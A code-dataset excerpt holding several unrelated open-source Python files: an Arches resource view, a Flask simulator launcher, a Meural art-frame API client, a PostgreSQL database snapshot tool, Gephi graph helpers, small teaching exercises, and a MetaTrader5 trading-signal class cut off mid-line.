JSONSerializer().serializeToPython(resource)\n res[\"ontologyclass\"] = resource.get_root_ontology()\n ret.append(res)\n\n elif self.action == \"get_relatable_resources\":\n graphid = request.GET.get(\"graphid\", None)\n nodes = models.Node.objects.filter(graph=graphid).exclude(istopnode=False)[0].get_relatable_resources()\n ret = {str(node.graph_id) for node in nodes}\n\n else:\n lang = request.GET.get(\"lang\", request.LANGUAGE_CODE)\n resourceinstance_graphid = request.GET.get(\"resourceinstance_graphid\")\n paginate = strtobool(request.GET.get(\"paginate\", \"true\")) # default to true\n resource = Resource.objects.get(pk=resourceid)\n\n if paginate:\n page = 1 if request.GET.get(\"page\") == \"\" else int(request.GET.get(\"page\", 1))\n start = int(request.GET.get(\"start\", 0))\n\n related_resources = resource.get_related_resources(\n lang=lang,\n start=start,\n page=page,\n user=request.user,\n resourceinstance_graphid=resourceinstance_graphid,\n graphs=self.graphs,\n )\n\n ret = self.paginate_related_resources(related_resources=related_resources, page=page, request=request)\n else:\n ret = resource.get_related_resources(\n lang=lang, user=request.user, resourceinstance_graphid=resourceinstance_graphid, graphs=self.graphs\n )\n\n return JSONResponse(ret)\n\n def delete(self, request, resourceid=None):\n lang = request.GET.get(\"lang\", 
request.LANGUAGE_CODE)\n se = SearchEngineFactory().create()\n req = dict(request.GET)\n ids_to_delete = req[\"resourcexids[]\"]\n root_resourceinstanceid = req[\"root_resourceinstanceid\"]\n for resourcexid in ids_to_delete:\n try:\n ret = models.ResourceXResource.objects.get(pk=resourcexid).delete()\n except ObjectDoesNotExist:\n logger.exception(_(\"Unable to delete. Relationship does not exist\"))\n start = request.GET.get(\"start\", 0)\n resource = Resource.objects.get(pk=root_resourceinstanceid[0])\n page = 1 if request.GET.get(\"page\") == \"\" else int(request.GET.get(\"page\", 1))\n related_resources = resource.get_related_resources(lang=lang, start=start, limit=1000, page=page, user=request.user)\n ret = []\n\n if related_resources is not None:\n ret = self.paginate_related_resources(related_resources, page, request)\n\n return JSONResponse(ret, indent=4)\n\n def post(self, request, resourceid=None):\n lang = request.GET.get(\"lang\", request.LANGUAGE_CODE)\n se = SearchEngineFactory().create()\n res = dict(request.POST)\n relationshiptype = res[\"relationship_properties[relationshiptype]\"][0]\n datefrom = res[\"relationship_properties[datestarted]\"][0]\n dateto = res[\"relationship_properties[dateended]\"][0]\n dateto = None if dateto == \"\" else dateto\n datefrom = None if datefrom == \"\" else datefrom\n notes = res[\"relationship_properties[notes]\"][0]\n root_resourceinstanceid = res[\"root_resourceinstanceid\"]\n instances_to_relate = []\n relationships_to_update = []\n if \"instances_to_relate[]\" in res:\n instances_to_relate = res[\"instances_to_relate[]\"]\n if \"relationship_ids[]\" in res:\n relationships_to_update = res[\"relationship_ids[]\"]\n\n def get_relatable_resources(graphid):\n \"\"\"\n Takes the graphid of a resource, finds the graphs root node, and returns the relatable graphids\n \"\"\"\n nodes = models.Node.objects.filter(graph_id=graphid)\n top_node = [node for node in nodes if node.istopnode == True][0]\n relatable_resources = [str(node.graph_id) for node in top_node.get_relatable_resources()]\n return relatable_resources\n\n def confirm_relationship_permitted(to_id, from_id):\n resource_instance_to = models.ResourceInstance.objects.filter(resourceinstanceid=to_id)[0]\n resource_instance_from = models.ResourceInstance.objects.filter(resourceinstanceid=from_id)[0]\n relatable_to = get_relatable_resources(resource_instance_to.graph_id)\n relatable_from = get_relatable_resources(resource_instance_from.graph_id)\n relatable_to_is_valid = str(resource_instance_to.graph_id) in relatable_from\n relatable_from_is_valid = str(resource_instance_from.graph_id) in relatable_to\n return relatable_to_is_valid is True and relatable_from_is_valid is True\n\n for instanceid in instances_to_relate:\n permitted = confirm_relationship_permitted(instanceid, root_resourceinstanceid[0])\n if permitted is True:\n rr = models.ResourceXResource(\n resourceinstanceidfrom=Resource(root_resourceinstanceid[0]),\n resourceinstanceidto=Resource(instanceid),\n notes=notes,\n relationshiptype=relationshiptype,\n datestarted=datefrom,\n dateended=dateto,\n )\n try:\n rr.save()\n except PublishedModelError as e:\n message = _(\"Unable to save. 
Please verify the model is not currently published.\")\n                    return JSONResponse({\"status\": \"false\", \"message\": [_(e.title), _(str(message))]}, status=500)\n            else:\n                logger.warning(\"relationship not permitted\")\n\n        for relationshipid in relationships_to_update:\n            rr = models.ResourceXResource.objects.get(pk=relationshipid)\n            rr.notes = notes\n            rr.relationshiptype = relationshiptype\n            rr.datestarted = datefrom\n            rr.dateended = dateto\n            try:\n                rr.save()\n            except PublishedModelError as e:\n                message = _(\"Unable to save. Please verify the model is not currently published.\")\n                return JSONResponse({\"status\": \"false\", \"message\": [_(e.title), _(str(message))]}, status=500)\n\n        start = request.GET.get(\"start\", 0)\n        resource = Resource.objects.get(pk=root_resourceinstanceid[0])\n        page = 1 if request.GET.get(\"page\") == \"\" else int(request.GET.get(\"page\", 1))\n        related_resources = resource.get_related_resources(lang=lang, start=start, limit=1000, page=page, user=request.user)\n        ret = []\n\n        if related_resources is not None:\n            ret = self.paginate_related_resources(related_resources, page, request)\n\n        return JSONResponse(ret, indent=4)\n","repo_name":"archesproject/arches","sub_path":"arches/app/views/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":46843,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"77"}
+{"seq_id":"7988446621","text":"import logging\nimport platform\n\nfrom network_simulator import create_app\n\n\ndef get_container_id():\n    return platform.node()\n\n\ndef setup_logging():\n    log_formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\n    file_handler = logging.FileHandler(\"network_simulator.log\")\n    file_handler.setFormatter(log_formatter)\n    file_handler.setLevel(logging.DEBUG)\n\n    console_handler = logging.StreamHandler()\n    console_handler.setFormatter(log_formatter)\n    console_handler.setLevel(logging.DEBUG)\n\n    logging.basicConfig(handlers=[file_handler, console_handler])\n\n\nif __name__ == \"__main__\":\n    setup_logging()\n\n    net_namespace = get_container_id()\n    app = create_app(net_namespace)\n\n    app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","repo_name":"mLe110/network-simulator","sub_path":"network_simulator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"14349613408","text":"import io\nimport logging\nfrom asyncio import Lock, Semaphore\nfrom copy import deepcopy\nfrom dataclasses import dataclass, field\nfrom functools import partialmethod\nfrom pathlib import Path\nfrom typing import Any, Callable, ClassVar, Dict, Literal, Optional, Union, cast\n\nimport aiohttp\nimport async_timeout\nfrom aiohttp.client_exceptions import ClientResponseError\n\n_LOGGER = logging.getLogger(__name__)\n\nBASE_URL = 'https://api.meural.com/v0/'\nAUTHENTICATE_PATH = 'authenticate'\n\nJsonT = Dict[str, Any]\nIdT = Union[str, int]\nDataT = Union[JsonT, None]\n\n\ndef filter_none(*_d: JsonT, **_dd: Any) -> JsonT:\n    return {k: v for d in [*_d, _dd] for k, v in d.items() if v}\n\n\n@dataclass\nclass Meural:\n    username: str = ''\n    password: str = ''\n    # do not open a ClientSession at import time (there is no running event\n    # loop yet); request() below creates and closes its own session per call\n    session: Optional[aiohttp.ClientSession] = None\n    token: Optional[str] = None\n    _lock: ClassVar[Semaphore] = Semaphore(3)\n\n    async def request(\n        self,\n        method: Literal['GET', 'PUT', 'POST', 'DELETE'],\n        path: str,\n        data: Union[JsonT, None] = None,\n        
form: bool = False,\n        raise_for_status: bool = True,\n        data_key: str = 'data',\n    ) -> JsonT:\n        url = f'{BASE_URL}{path}'\n        kwargs: Dict[str, Any] = {}\n        headers = {\n            'Authorization': f'Token {self.token}',\n            'x-meural-api-version': '3',\n        }\n\n        if path == AUTHENTICATE_PATH:\n            headers.pop('Authorization')\n\n        if data:\n            if form:\n                kwargs['data'] = aiohttp.FormData(deepcopy(data))\n            elif method == 'GET':\n                # aiohttp expects query-string data under 'params'\n                kwargs['params'] = data\n            else:\n                kwargs['json'] = data\n\n        try:\n            async with self._lock, aiohttp.ClientSession(\n                headers=headers\n            ) as session, session.request(\n                method, url, raise_for_status=raise_for_status, **kwargs\n            ) as resp:\n                # the async with block closes the session on exit\n                response: JsonT = await resp.json()\n                return response[data_key]\n\n        except ClientResponseError as err:\n            if err.status != 401:\n                raise\n            elif err.status == 401 and path == AUTHENTICATE_PATH:\n                raise\n\n            _LOGGER.info('Meural: Sending Request failed. Re-Authenticating')\n            await self.login(force=True)\n            return await self.request(\n                method,\n                path,\n                data=data,\n                form=form,\n                raise_for_status=raise_for_status,\n                data_key=data_key,\n            )\n        except Exception as err:\n            _LOGGER.error('Meural: Sending Request failed. Raising: %s', err)\n            raise\n\n    async def get(\n        self,\n        path: str,\n        data: DataT = None,\n        form: bool = False,\n        raise_for_status: bool = True,\n        data_key: str = 'data',\n    ) -> JsonT:\n        return await self.request(\n            'GET',\n            path,\n            data=data,\n            form=form,\n            raise_for_status=raise_for_status,\n            data_key=data_key,\n        )\n\n    async def put(\n        self,\n        path: str,\n        data: DataT = None,\n        form: bool = False,\n        raise_for_status: bool = True,\n        data_key: str = 'data',\n    ) -> JsonT:\n        return await self.request(\n            'PUT',\n            path,\n            data=data,\n            form=form,\n            raise_for_status=raise_for_status,\n            data_key=data_key,\n        )\n\n    async def post(\n        self,\n        path: str,\n        data: DataT = None,\n        form: bool = False,\n        raise_for_status: bool = True,\n        data_key: str = 'data',\n    ) -> JsonT:\n        return await self.request(\n            'POST',\n            path,\n            data=data,\n            form=form,\n            raise_for_status=raise_for_status,\n            data_key=data_key,\n        )\n\n    async def delete(\n        self,\n        path: str,\n        data: DataT = None,\n        form: bool = False,\n        raise_for_status: bool = True,\n        data_key: str = 'data',\n    ) -> JsonT:\n        return await self.request(\n            'DELETE',\n            path,\n            data=data,\n            form=form,\n            raise_for_status=raise_for_status,\n            data_key=data_key,\n        )\n\n    async def login(\n        self,\n        username: str = '',\n        password: str = '',\n        force: bool = False,\n        _auth_lock: Lock = Lock(),\n    ) -> None:\n        \"\"\"Authenticate and return a token.\"\"\"\n\n        if force:\n            self.token = None\n\n        async with _auth_lock:\n\n            if self.token:\n                return\n\n            self.username = username or self.username\n            self.password = password or self.password\n\n            assert self.username, 'username must be set before login'\n            assert self.password, 'password must be set before login'\n\n            _LOGGER.info('Meural: Authenticating')\n            token = await self.post(\n                AUTHENTICATE_PATH,\n                data={'username': self.username, 'password': self.password},\n                raise_for_status=True,\n                data_key='token',\n            )\n            assert token and isinstance(\n                token, str\n            ), 'token was not provided in the authentication response'\n            self.token = token\n\n    async def get_user(self) -> JsonT:\n        return await self.get('user')\n\n    async def get_user_items(self) -> JsonT:\n        return await self.get('user/items')\n\n    async def get_user_galleries(self) -> JsonT:\n        return await self.get('user/galleries')\n\n    async def get_user_devices(self) -> JsonT:\n        return await self.get('user/devices')\n\n    async def get_user_feedback(self) -> JsonT:\n        return await self.get('user/feedback')\n\n    
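    # Note: the four verb wrappers above differ only in the HTTP method they
    # pass to request(); functools.partialmethod (already imported at the top
    # of this module but unused) could express the same API more compactly.
    # A minimal sketch, not the original code:
    #     get = partialmethod(request, 'GET')
    #     put = partialmethod(request, 'PUT')
    #     post = partialmethod(request, 'POST')
    #     delete = partialmethod(request, 'DELETE')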
async def device_load_gallery(self, device_id: IdT, gallery_id: IdT):\n        return await self.post(f'devices/{device_id}/galleries/{gallery_id}')\n\n    async def device_load_item(self, device_id: IdT, item_id: IdT):\n        return await self.post(f'devices/{device_id}/items/{item_id}')\n\n    async def get_device(self, device_id: IdT) -> JsonT:\n        return await self.get(f'devices/{device_id}')\n\n    async def get_device_galleries(self, device_id: IdT) -> JsonT:\n        return await self.get(f'devices/{device_id}/galleries')\n\n    async def update_device(self, device_id: IdT, data: JsonT):\n        return await self.put(f'devices/{device_id}', data)\n\n    async def sync_device(self, device_id: IdT):\n        return await self.post(f'devices/{device_id}/sync')\n\n    async def get_item(self, item_id: IdT) -> JsonT:\n        return await self.get(f'items/{item_id}')\n\n    async def update_item(\n        self,\n        item_id: IdT,\n        name: Optional[str] = None,\n        author: Optional[str] = None,\n        description: Optional[str] = None,\n        medium: Optional[str] = None,\n        year: Union[str, int, None] = None,\n    ) -> Optional[JsonT]:\n        data = filter_none(\n            name=name,\n            author=author,\n            description=description,\n            medium=medium,\n            year=str(year) if year else None,\n        )\n        if data:\n            return await self.put(f'items/{item_id}', data)\n        else:\n            return None\n\n    async def add_item(\n        self,\n        image_bytes: io.BytesIO,\n        gallery_id: Optional[IdT] = None,\n        name: Optional[str] = None,\n        author: Optional[str] = None,\n        description: Optional[str] = None,\n        medium: Optional[str] = 'photography',\n        year: Optional[int] = None,\n    ) -> JsonT:\n        item = await self.post('items', data={'image': image_bytes}, form=True)\n        item_id: int = item['id']\n\n        await self.update_item(\n            item_id,\n            name=name,\n            author=author,\n            description=description,\n            medium=medium,\n            year=year,\n        )\n        if gallery_id:\n            await self.add_to_gallery(gallery_id=gallery_id, item_id=item_id)\n\n        return item\n\n    async def add_to_gallery(self, gallery_id: IdT, item_id: IdT) -> JsonT:\n        return await self.post(f'galleries/{gallery_id}/items/{item_id}')\n","repo_name":"NorthIsUp/we-love-bot","sub_path":"welovebot/lib/frames/meural.py","file_name":"meural.py","file_ext":"py","file_size_in_byte":8106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"21444012163","text":"# Applying regular functions and a lambda function with filter()\narr = ['a', 1, 2, 'b', 13, 17, 'c', 2.5, 7.9]\n\ndef f1(arr):\n    if isinstance(arr, int):\n        return True\n    return False\n\n\ndef f2(arr):\n    if isinstance(arr, float):\n        return True\n    else:\n        return False\n\n\ndef f3(arr):\n    return isinstance(arr, str)\nans=list(filter(f3,arr))\nans1=list(filter(f2,arr))\nprint(f'Strings in the list : {ans}')\nprint(f'Floats in the list : {ans1}')\nans3=list(filter(f1,arr))\nprint(f'Integers in the list : {ans3}')\nans3=list(filter(lambda n: n<5, ans3))\nprint(f'Integers under 5 in the list : {ans3}')","repo_name":"nabilera1/codingTestPython","sub_path":"코딩테스트학습/문법 필터함수 예제.py","file_name":"문법 필터함수 예제.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"39261867447","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\n\n\nclass TagExists(Exception):\n    pass\n\n\nclass NoTemplate(Exception):\n    pass\n\n\nclass ODB(object):\n    \"\"\"class representing an Odoo instance\n    \"\"\"\n    def __init__(self, db=None):\n        self.db = db\n\n    def connect(self, db=None):\n        \"\"\" connect to the current db unless specified\n        \"\"\"\n        if db is None:\n            db = self.db\n        return psycopg2.connect('dbname=%s' % db)\n\n    def 
_createdb(self):\n \"\"\" createdb used for tests\n \"\"\"\n db = self.db\n with self.connect('postgres') as cn:\n cn.autocommit = True\n cn.cursor().execute('CREATE DATABASE \"%s\"', (AsIs(db),))\n with self.connect(db) as cn, cn.cursor() as cr:\n cr.execute(\"CREATE TABLE ir_config_parameter \"\n \"(key character varying(256), value text)\")\n\n def dropdb(self, db=None):\n \"\"\" drop db\n \"\"\"\n if db is None:\n db = self.db\n with self.connect('postgres') as cn, cn.cursor() as cr:\n cn.autocommit = True\n self._disconnect(cr, db)\n cn.cursor().execute('DROP DATABASE \"%s\"', (AsIs(db),))\n\n def init(self):\n \"\"\" initialize the db with the revision\n \"\"\"\n revision = self.get('revision')\n with self.connect() as cn, cn.cursor() as cr:\n if revision is None:\n revision = '1'\n self.set('revision', revision, cr)\n self.set('parent', '0', cr)\n return int(revision)\n\n def set(self, key, value, cr=None):\n \"\"\" set the value of a key\n \"\"\"\n update = \"UPDATE ir_config_parameter SET value=%s WHERE key=%s\"\n insert = \"INSERT INTO ir_config_parameter (value, key) values (%s, %s)\"\n values = (str(value), 'odb.%s' % key)\n if cr is not None:\n cr.execute(update, values)\n if not cr.rowcount:\n cr.execute(insert, values)\n else:\n with self.connect() as cn, cn.cursor() as cr:\n cr.execute(update, values)\n if not cr.rowcount:\n cr.execute(insert, values)\n\n def get(self, key, cr=None):\n \"\"\" get the value of a key\n \"\"\"\n req = \"SELECT value FROM ir_config_parameter WHERE key=%s\"\n if cr is not None:\n cr.execute(req, ('odb.' + key,))\n res = cr.fetchone()\n else:\n with self.connect() as cn, cn.cursor() as cr:\n cr.execute(req, ('odb.' + key,))\n res = cr.fetchone()\n if res is not None and len(res) == 1:\n return res[0]\n\n def rem(self, key, cr=None):\n \"\"\" delete a key\n \"\"\"\n req = \"DELETE FROM ir_config_parameter WHERE key=%s\"\n if cr is not None:\n cr.execute(req, ('odb.' + key,))\n else:\n with self.connect() as cn, cn.cursor() as cr:\n cr.execute(req, ('odb.' 
+ key,))\n\n def revision(self):\n \"\"\" returns the db revision\n \"\"\"\n return int(self.get('revision'))\n\n def parent(self):\n \"\"\" get the parent snapshot\n \"\"\"\n return int(self.get('parent'))\n\n def _disconnect(self, cr, db):\n \"\"\" kill all pg connections\n \"\"\"\n cr.execute('select version()') # procpid renamed to pid in PG9.2\n pid = 'pid' if cr.fetchone()[0][:14] >= \"PostgreSQL 9.2\" else 'procpid'\n cr.execute(\"SELECT pg_terminate_backend(pg_stat_activity.%s) \"\n \"FROM pg_stat_activity \"\n \"WHERE pg_stat_activity.datname=%%s \"\n \"AND %s <> pg_backend_pid()\" % (pid, pid), (db,))\n\n def commit(self, msg=None):\n \"\"\" create a snapshot and change the current revision\n \"\"\"\n if msg:\n self.set('message', msg)\n revision = self.revision()\n targetdb = '*'.join([self.db, str(revision)])\n with self.connect('postgres') as cn, cn.cursor() as cr:\n cn.autocommit = True\n self._disconnect(cr, self.db)\n cr.execute('CREATE DATABASE \"%s\" WITH TEMPLATE \"%s\"', (AsIs(targetdb), AsIs(self.db)))\n self.set('revision', revision + 1)\n self.set('parent', revision)\n self.rem('tag')\n self.rem('message')\n\n def revert(self, parent=None, tag=None):\n \"\"\" drop the current db and start back from this parent\n (or the current parent if no parent is specified)\n \"\"\"\n if parent is None and tag is None: # revert to last\n parent = self.parent()\n if tag: # revert to tag\n tagfound = [r for r in self.log() if r.get('tag') == tag]\n if tagfound:\n parent = tagfound[0]['revision']\n else:\n return\n # store revision because we'll drop\n currevision = self.revision()\n sourcedb = '*'.join([self.db, str(parent)])\n with self.connect() as cn, cn.cursor() as cr:\n cn.autocommit = True\n self._disconnect(cr, self.db)\n with self.connect('postgres') as cn, cn.cursor() as cr:\n cn.autocommit = True\n # check that the source db exists to avoid dropping too early\n cr.execute('SELECT count(*) FROM pg_catalog.pg_database where datname=%s', (sourcedb,))\n if not cr.fetchone()[0]:\n raise NoTemplate('Cannot revert because the source db does not exist')\n cr.execute('DROP DATABASE \"%s\"', (AsIs(self.db),))\n cr.execute('CREATE DATABASE \"%s\" WITH TEMPLATE \"%s\"', (AsIs(self.db), AsIs(sourcedb)))\n self.set('revision', currevision)\n self.set('parent', parent)\n self.rem('tag')\n self.rem('message')\n\n def log(self):\n \"\"\" return a list of previous revisions, each revision being a dict with needed infos\n \"\"\"\n log = []\n with self.connect() as cn, cn.cursor() as cr:\n req = 'SELECT datname FROM pg_catalog.pg_database WHERE datname like %s'\n cr.execute(req, (self.db + '*%',))\n dbnames = cr.fetchall()\n for db in [d[0] for d in dbnames] + [self.db]:\n with self.connect(db) as cn, cn.cursor() as cr:\n log.append({\n 'db': db,\n 'revision': int(self.get('revision', cr)),\n 'parent': int(self.get('parent', cr)),\n })\n tag = self.get('tag', cr)\n if tag:\n log[-1]['tag'] = tag\n msg = self.get('message', cr)\n if msg:\n log[-1]['message'] = msg\n return sorted(log, key=lambda x: x['revision'], reverse=True)\n\n def purge(self, what, confirm=False):\n \"\"\" purge the revisions\n ``what`` can be::\n - ``all``: drop all revisions\n - ``keeptags``: drop all untagged revisions\n \"\"\"\n # first get what will be purged, then confirm\n to_purge = [i for i in self.log() if i['db'] != self.db]\n if what == 'all':\n pass\n elif what == 'keeptags':\n to_purge = [i for i in to_purge if 'tag' not in i]\n else:\n raise NotImplementedError('Bad purge command')\n if confirm:\n for 
logitem in to_purge:\n                self.dropdb(logitem['db'])\n        return to_purge\n\n    def tag(self, tag=None, revision=None, delete=False):\n        \"\"\" tag a specific revision or the current one by default\n        \"\"\"\n        tags = [r for r in self.log() if 'tag' in r]\n        if delete:\n            if tag in [r.get('tag') for r in tags]:\n                db = [r['db'] for r in tags if r.get('tag') == tag][0]\n                with self.connect(db) as cn, cn.cursor() as cr:\n                    return self.rem('tag', cr)\n            return\n        if tag is None and revision is None:\n            return tags\n        if tag is not None and tag in [r.get('tag') for r in tags]:\n            raise TagExists('This tag already exists')\n        if revision is None:\n            revision = self.revision()\n        if self.revision() == revision:\n            db = self.db\n        else:\n            db = '%s*%s' % (self.db, revision)\n        with self.connect(db) as cn, cn.cursor() as cr:\n            self.set('tag', tag, cr)\n","repo_name":"meiffret/fm_media_odoo11","sub_path":"venv/lib/python3.5/site-packages/odb/odb.py","file_name":"odb.py","file_ext":"py","file_size_in_byte":8323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"37130889735","text":"x = []\nwhile True:\n    v = int(input(\"Enter a number (a negative value ends input): \"))\n    if v >= 0:\n        x.append(v)\n    else:\n        break\nfor i in range(0, len(x) - 1):\n    for j in range(i+1, len(x)):\n        if x[i] > x[j]:\n            x[i], x[j] = x[j], x[i]\nprint(x)\n","repo_name":"marceloarantes19/estruturaDeDados2022","sub_path":"revisao/vetores/exercicio9.py","file_name":"exercicio9.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"}
+{"seq_id":"73107748088","text":"# -*- coding: utf-8 -*-\n\n\ndef find_neighbors(degree_sep, node):\n    \"\"\"\n    find a node's neighbors to n degrees of separation.\n    ------------\n    params - degree_sep: degrees of separation. 
integer > 1\n    node: node id\n    ------------\n    return - a set of neighbors to the nth degree with no 'NoneType'\n    \"\"\"\n    neighbors = set([])\n    newset = set([])\n\n    # update a set for neighbors iteration.\n    # update direct neighbors into the neighbors set\n    newset.update(node.neighbors)\n    neighbors.update(node.neighbors)\n\n    # drives the following iterations\n    # n-1 because 1st degree neighbors are automatically updated to set\n    for x in range(degree_sep-1):\n\n        # keeps track of next neighbor set for iteration with a helperset\n        helperset = set([])\n\n        # finds neighbors of newset and updates to the helperset\n        # checks newset for 'NoneType' and removes them\n        for neighbor in newset:\n            if neighbor:\n                helperset.update(neighbor.neighbors)\n        # changes the helperset into newset for next round of iterations\n        newset = helperset\n\n        # appends neighbors for each degree of separation to the master set\n        neighbors.update(newset)\n\n    # filter out any remaining None values and return a set, as documented\n    return set(filter(bool, neighbors))\n\n\ndef att_filter(myset, att_type, att):\n    nodes = []\n    # relies on the global graph object \"g\" provided by the Gephi scripting console\n    visible = g.filter(att_type == att)\n    for node in myset:\n        if node in visible.nodes:\n            nodes.append(node)\n    nodes = set(nodes)\n    return nodes\n\n\ndef filter_set_type(myset, att):\n    nodes = []\n    for node in myset:\n        if node.NodeType == att:\n            nodes.append(node)\n    nodes = set(nodes)\n    return nodes\n\n\ndef type_neighbors(att_type, att, myset):\n    # argument order matches the att_filter(myset, att_type, att) signature above\n    nodes = att_filter(myset, att_type, att)\n    neighbors = set(nodes)\n    for node in nodes:\n        neighbors.update(node.neighbors)\n    return neighbors\n\n\ndef fix_set(myset):\n    \"\"\"\n    fixes the position of a set of nodes in the graph\n    --------------------------\n    param - myset: any set of nodes\n    \"\"\"\n    for node in myset:\n        node.fixed = True\n\n\ndef color_set(myset, color):\n    \"\"\"\n    color a set of nodes\n    -----------------\n    params - myset: the set of nodes to be colored\n             color: the desired color\n    \"\"\"\n    for node in myset:\n        node.color = color\n\n\ndef size_set(myset, size):\n    \"\"\"\n    control the size of a set of nodes\n    -----------------\n    params - myset: the set of nodes to be sized\n             size: the desired size\n    \"\"\"\n    for node in myset:\n        if node:\n            node.size = size\n\n\ndef return_label(myset):\n    \"\"\"\n    return the labels of a set of nodes\n    ---------------\n    param - myset: a set of nodes\n    -----------\n    return - the labels of a set of nodes\n    \"\"\"\n    labellist = []\n    for node in myset:\n        labellist.append(node.label)\n    return labellist\n\n\ndef set_intersect(set1, set2):\n    \"\"\"\n    find the intersecting nodes of two sets\n    ________________\n    params - set1, set2: subsets of nodes in a graph\n    ____________\n    return - the intersecting set\n    \"\"\"\n    return set(set(set1) & set(set2))\n","repo_name":"CulturePlex/Preliminares","sub_path":"gephi.py","file_name":"gephi.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"11647521746","text":"import pandas as pd\nimport MetaTrader5 as mt5\nimport plotly.graph_objects as go\n\nmt5.initialize()\n\ntrading_hours = [(10, 15)]\n\n\nclass Signals:\n    # Define function to calculate EMA\n    def calculate_ema(self, data, length):\n        return data['close'].ewm(span=length).mean()\n\n    # Define function to calculate ATR\n    def calculate_atr(self, data, period):\n        high_low = data['high'] - data['low']\n        high_close = (data['high'] - data['close'].shift()).abs()\n        low_close = (data['low'] - data['close'].shift()).abs()\n        ranges = pd.concat([high_low, high_close, low_close], axis=1)\n        true_range 
= ranges.max(axis=1)\n        return true_range.rolling(period).mean()\n\n    def calculate_rsi(self, series, window=14):\n        close_diff = series.diff(1)\n        positive_change = close_diff.where(close_diff > 0, 0)\n        negative_change = close_diff.where(close_diff < 0, 0)\n        average_gain = positive_change.rolling(window).mean()\n        # losses must enter the ratio as positive magnitudes, otherwise rs\n        # (and with it the RSI) comes out negative\n        average_loss = negative_change.abs().rolling(window).mean()\n        rs = average_gain / average_loss\n        rsi = 100 - (100 / (1 + rs))\n        return rsi\n\n    # Define function to check trading hours\n    def check_trading_hours(self, hour, minute):\n        for start, end in trading_hours:\n            if start <= hour < end:\n                return True\n        return False\n\n    # Define function to place order\n    def place_order(self, symbol, order_type, volume, price, stop_loss, take_profit):\n        if order_type == 'buy':\n            trade_type = mt5.ORDER_TYPE_BUY\n        elif order_type == 'sell':\n            trade_type = mt5.ORDER_TYPE_SELL\n        else:\n            print('Invalid order type')\n            return\n\n        request = {\n            'action': mt5.TRADE_ACTION_DEAL,\n            'symbol': symbol,\n            'volume': volume,\n            'type': trade_type,\n            'price': price,\n            'sl': stop_loss,\n            'tp': take_profit,\n            'magic': 123456,\n            'comment': 'Trade bot order',\n            'type_time': mt5.ORDER_TIME_GTC,\n            'type_filling': mt5.ORDER_FILLING_IOC,\n        }\n\n        result = mt5.order_send(request)\n\n        return result\n\n    def check_signal(self, symbol, show_plot=False):\n        ema_length = 100\n        pip_threshold = 10\n        lookback = 100\n        atr_period = 14\n        gap_window = 100\n        bar_limit = 1000\n        data = pd.DataFrame(mt5.copy_rates_from_pos(symbol, mt5.TIMEFRAME_M15, 0, lookback))\n        # Calculate EMA\n        if data.shape[0] < ema_length:\n            ema_length = data.shape[0]\n        if data.shape[0] < gap_window:\n            gap_window = data.shape[0]\n        data['ema'] = self.calculate_ema(data, ema_length)\n        # Calculate gap\n        data['gap'] = data['close'] - data[\"ema\"]\n        # Calculate longest gap\n        data[\"longest_gap\"] = data[\"gap\"].rolling(window=gap_window).max()\n        # Calculate ATR\n        data['atr'] = self.calculate_atr(data, atr_period)\n        data[\"buy_condition\"] = data[\"gap\"] < 0\n        data[\"sell_condition\"] = data[\"gap\"] > 0\n        data[\"wick_size\"] = abs(data[\"high\"] - data[\"low\"]) / mt5.symbol_info(symbol).point\n        data[\"buy_wick_condition\"] = data[\"buy_condition\"] & (data[\"wick_size\"] >= pip_threshold)\n        data[\"sell_wick_condition\"] = data[\"sell_condition\"] & (data[\"wick_size\"] >= pip_threshold)\n        data[\"buy_wick_count\"] = data[\"buy_wick_condition\"].rolling(window=bar_limit).sum()\n        data[\"sell_wick_count\"] = data[\"sell_wick_condition\"].rolling(window=bar_limit).sum()\n        data[\"fib_59\"] = (\n            data[\"low\"].shift(1)\n            + (data[\"high\"].shift(1) - data[\"low\"].shift(1)) * 0.59\n        )\n        data[\"fib_163\"] = (\n            data[\"low\"].shift(1)\n            + (data[\"high\"].shift(1) - data[\"low\"].shift(1)) * 1.63\n        )\n        data['rsi'] = self.calculate_rsi(data[\"close\"], window=14)\n        # Get latest bar\n        latest_bar = data.iloc[-1]\n        symbol_data = mt5.symbol_info(symbol)\n        if show_plot:\n            # Ensure the data is sorted by index before plotting\n            candle_data = data.sort_index()\n            buy_signals = data.loc[data[\"buy_wick_condition\"], :]\n            sell_signals = data.loc[data[\"sell_wick_condition\"], :]\n            plot_data(candle_data, buy_signals, sell_signals)\n\n        if data[\"buy_wick_condition\"].any():\n            entry_price = symbol_data.ask\n            return {'symbol': symbol, 'trade_type': 'buy', 'entry_price': entry_price, 'stop_loss': 0,\n                    'take_profit': 0}\n        elif data[\"sell_wick_condition\"].any():\n            entry_price = symbol_data.bid\n            return {'symbol': symbol, 'trade_type': 'sell', 'entry_price': entry_price, 'stop_loss': 0,\n                    'take_profit': 
